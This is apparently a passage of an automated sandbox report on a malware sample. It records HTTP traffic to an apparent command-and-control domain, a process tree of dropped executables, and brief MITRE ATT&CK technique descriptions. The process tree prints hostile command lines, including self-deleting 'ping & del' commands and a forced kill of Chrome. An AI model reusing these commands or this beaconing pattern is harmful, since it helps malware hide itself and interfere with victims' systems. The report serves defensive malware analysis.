3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49716	104.21.23.16	80	C:\Users\user\Desktop\Cyfj6XGbkd.exe

Timestamp	kBytes transferred	Direction	Data
Jan 29, 2021 17:50:43.850296021 CET	122	OUT	POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:50:43.917998075 CET	123	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:50:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d19ff159434bf19f0ca9e04fb07ce1bd11611939043; expires=Sun, 28-Feb-21 16:50:43 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f0a6f22e00004c0de33ce000000001 Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Zf91PCeqBI0db%2FT%2BKAv%2FgCjx%2F%2FZSUmdeMdlOXEVpjigoxG4dRO5oEOuEJKT7rCvcTRMnMeH0W86Z1sqe6ZhAQwLzRxQJ9IF4m%2Bd3G7CjKgEedTRswA%3D%3D"}]} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 619474304ac44c0d-AMS Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="vi
Jan 29, 2021 17:50:46.055474997 CET	128	OUT	POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:50:46.111821890 CET	130	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:50:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d4651ebe6cae4c428aec3a5f905dfe9d51611939046; expires=Sun, 28-Feb-21 16:50:46 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f0a6facc00004c0da5092000000001 Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=VUoXtp2VI59PFr%2F%2BK0wGOB9H9%2Bq5nr42iTrqTVZuCTk1Cpam%2BNSzGQgs0%2FfniRQpo8IxML9U6Pjdt1LEPtxAPSOU1zPtrQ8O8QiwMccyBHZUyyoZ3g%3D%3D"}]} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6194743e1b9a4c0d-AMS Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="view

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49732	104.21.23.16	80	C:\Users\user\Desktop\Cyfj6XGbkd.exe

Timestamp	kBytes transferred	Direction	Data
Jan 29, 2021 17:51:18.547750950 CET	589	OUT	GET /info_old/ddd HTTP/1.1 Host: 84CFBA021A5A6662.xyz Accept: /
Jan 29, 2021 17:51:18.604099989 CET	591	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:51:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d4d07619870e0a6e2b398c556ac35ee711611939078; expires=Sun, 28-Feb-21 16:51:18 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f0a779b900004c01e7201000000001 Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=vQy7kiZQU84MkSuN%2BP9XrgpE3bpPVunsXJU11JDNdim4zS%2BRCewZ3R7fULw2srKpdROb7x9N%2BhElrrBHUNIMZDMZT4dwKyErFEHi5VxeTF1Z4OdcNg%3D%3D"}],"max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 619475092ab34c01-AMS Data Raw: 31 30 64 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 Data Ascii: 10d5<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: Cyfj6XGbkd.exe PID: 6728 Parent PID: 5848

General

Start time:	17:50:28
Start date:	29/01/2021
Path:	C:\Users\user\Desktop\Cyfj6XGbkd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Cyfj6XGbkd.exe'
Imagebase:	0x400000
File size:	4247224 bytes
MD5 hash:	63204EB716C856723A010747D58A6B00
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000000.00000002.244341295.0000000002880000.00000040.00000001.sdmp, Author: Florian Roth
Reputation:	low

Analysis Process: msiexec.exe PID: 6912 Parent PID: 6728

General

Start time:	17:50:32
Start date:	29/01/2021
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Imagebase:	0x1210000
File size:	59904 bytes
MD5 hash:	12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: 56BB1610C0318054.exe PID: 6956 Parent PID: 6728

General

Start time:	17:50:34
Start date:	29/01/2021
Path:	C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 0011 user01
Imagebase:	0x400000
File size:	4247224 bytes
MD5 hash:	63204EB716C856723A010747D58A6B00
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000002.00000002.333865446.00000000026F0000.00000040.00000001.sdmp, Author: Florian Roth
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 24%, Metadefender, Browse Detection: 59%, ReversingLabs
Reputation:	low

Analysis Process: msiexec.exe PID: 6984 Parent PID: 3920

General

Start time:	17:50:34
Start date:	29/01/2021
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding F759AAE600C1266B09FA365BCB174CA6 C
Imagebase:	0x1210000
File size:	59904 bytes
MD5 hash:	12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: 56BB1610C0318054.exe PID: 6992 Parent PID: 6728

General

Start time:	17:50:35
Start date:	29/01/2021
Path:	C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 200 user01
Imagebase:	0x400000
File size:	4247224 bytes
MD5 hash:	63204EB716C856723A010747D58A6B00
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000004.00000002.261783876.0000000002620000.00000040.00000001.sdmp, Author: Florian Roth
Reputation:	low

Analysis Process: cmd.exe PID: 7052 Parent PID: 6728

General

Start time:	17:50:36
Start date:	29/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\Cyfj6XGbkd.exe'
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 7072 Parent PID: 7052

General

Start time:	17:50:38
Start date:	29/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: PING.EXE PID: 7108 Parent PID: 7052

General

Start time:	17:50:40
Start date:	29/01/2021
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 3
Imagebase:	0x250000
File size:	18944 bytes
MD5 hash:	70C24A306F768936563ABDADB9CA9108
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: 1611971443428.exe PID: 4084 Parent PID: 6956

General

Start time:	17:50:43
Start date:	29/01/2021
Path:	C:\Users\user\AppData\Roaming\1611971443428.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\1611971443428.exe' /sjson 'C:\Users\user\AppData\Roaming\1611971443428.txt'
Imagebase:	0x400000
File size:	103632 bytes
MD5 hash:	EF6F72358CB02551CAEBE720FBC55F95
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 3%, Metadefender, Browse Detection: 14%, ReversingLabs
Reputation:	low

Analysis Process: cmd.exe PID: 5580 Parent PID: 6992

General

Start time:	17:50:43
Start date:	29/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c taskkill /f /im chrome.exe
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 5564 Parent PID: 5580

General

Start time:	17:50:45
Start date:	29/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 6244 Parent PID: 6992

General

Start time:	17:50:46
Start date:	29/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe'
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2172 Parent PID: 5580

General

Start time:	17:50:46
Start date:	29/01/2021
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im chrome.exe
Imagebase:	0xbb0000
File size:	74752 bytes
MD5 hash:	15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 2148 Parent PID: 6244

General

Start time:	17:50:46
Start date:	29/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: PING.EXE PID: 6420 Parent PID: 6244

General

Start time:	17:50:47
Start date:	29/01/2021
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 3
Imagebase:	0x250000
File size:	18944 bytes
MD5 hash:	70C24A306F768936563ABDADB9CA9108
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: ThunderFW.exe PID: 6312 Parent PID: 6956

General

Start time:	17:51:12
Start date:	29/01/2021
Path:	C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Imagebase:	0xf40000
File size:	73160 bytes
MD5 hash:	F0372FF8A6148498B19E04203DBB9E69
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, Metadefender, Browse Detection: 2%, ReversingLabs

Analysis Process: cmd.exe PID: 4928 Parent PID: 6956

General

Start time:	17:51:18
Start date:	29/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe'
Imagebase:	0x90000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 5628 Parent PID: 4928

General

Start time:	17:51:19
Start date:	29/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: PING.EXE PID: 5600 Parent PID: 4928

General

Start time:	17:51:20
Start date:	29/01/2021
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 3
Imagebase:	0xfc0000
File size:	18944 bytes
MD5 hash:	70C24A306F768936563ABDADB9CA9108
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: MpCmdRun.exe PID: 1724 Parent PID: 5564

General

Start time:	17:52:00
Start date:	29/01/2021
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Imagebase:	0x7ff6aa4d0000
File size:	455656 bytes
MD5 hash:	A267555174BFA53844371226F482B86B
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 6436 Parent PID: 1724

General

Start time:	17:52:00
Start date:	29/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

